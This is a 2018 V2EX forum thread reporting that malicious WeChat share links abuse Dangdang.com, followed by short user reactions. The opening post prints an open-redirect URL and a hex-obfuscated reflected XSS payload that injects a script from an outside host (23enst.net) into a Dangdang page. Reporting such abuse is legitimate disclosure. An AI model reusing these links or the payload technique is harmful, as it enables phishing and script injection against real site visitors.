当当可跳转任意网站

2018 年 7 月 5 日
 bin456789
被微信上的恶意分享连接利用了


https://login.dangdang.com/SignOut.asp?returnurl=http%3A%2F%2Fwx.etcwl.cn%2Fwtz%2Ffenx.php%3Ftype%3D2892&from=timeline


http://union.dangdang.com/transfer.php%01?from=P-295132-112509_64_0__1&backurl=http%253A%252F%252Fm.dangdang.com%252Fproduct.php%27;top.location.href=%27java%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx3a%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%5Cx2e%5Cx77%5Cx72%5Cx69%5Cx74%5Cx65%5Cx28%5Cx22%5Cx3c%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx20%5Cx73%5Cx72%5Cx63%5Cx3d%5Cx27%5Cx2f%5Cx2f%5Cx32%5Cx33%5Cx65%5Cx6e%5Cx73%5Cx74%5Cx2e%5Cx6e%5Cx65%5Cx74%5Cx2f%5Cx64%5Cx73%5Cx67%5Cx2e%5Cx6a%5Cx73%5Cx27%5Cx3e%5Cx3c%5Cx2f%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx3e%5Cx22%5Cx29%5Cx3b%27;//&tt=19976#1530770981499
5420 次点击
所在节点    全球工单系统
18 条回复
wly19960911
2018 年 7 月 5 日
这意思,可以直接钓鱼了吗?还是人家官方的域名。

吐槽下,居然不是 HTTPS,
blackhacker
2018 年 7 月 5 日
黑产最爱
hu5ky
2018 年 7 月 5 日
真仔细,这种角落的东西都挖到了
silencefent
2018 年 7 月 5 日
@hu5ky 说不定就是当当的员工
waytoshine
2018 年 7 月 5 日
牛逼啊兄弟,这也行
a7a2
2018 年 7 月 5 日
asp,php 我醉了
博彩业最爱
sunnywx
2018 年 7 月 5 日
这也可以发现,牛逼
opengps
2018 年 7 月 5 日
这个真的是微信里黑产防止屏蔽的用途了
Lentin
2018 年 7 月 5 日
justfindu
2018 年 7 月 5 日
@a7a2 这黑的我不服
neverandy
2018 年 7 月 5 日
@Lentin 666
i730
2018 年 7 月 5 日
@Lentin #9 login 域的 xss 就这么爆出来了,讲究
460881773
2018 年 7 月 6 日
@Lentin 优秀啊 dalao dalao
fxplay
2018 年 7 月 6 日
@Lentin 没茅台...当当还不修复么...
xiri
2018 年 7 月 6 日
@Lentin 真心 6
Lentin
2018 年 7 月 6 日
@fxplay 当当网的技术应该是兼职,24 小时过去了
li520sai
2018 年 7 月 6 日
这波操作 6,有没有爱好者一起研究 xss 的,wx:houccdaye
EmitRemmus
2018 年 7 月 13 日
@a7a2 也是色情业最爱。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://study.congcong.us/t/468352

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX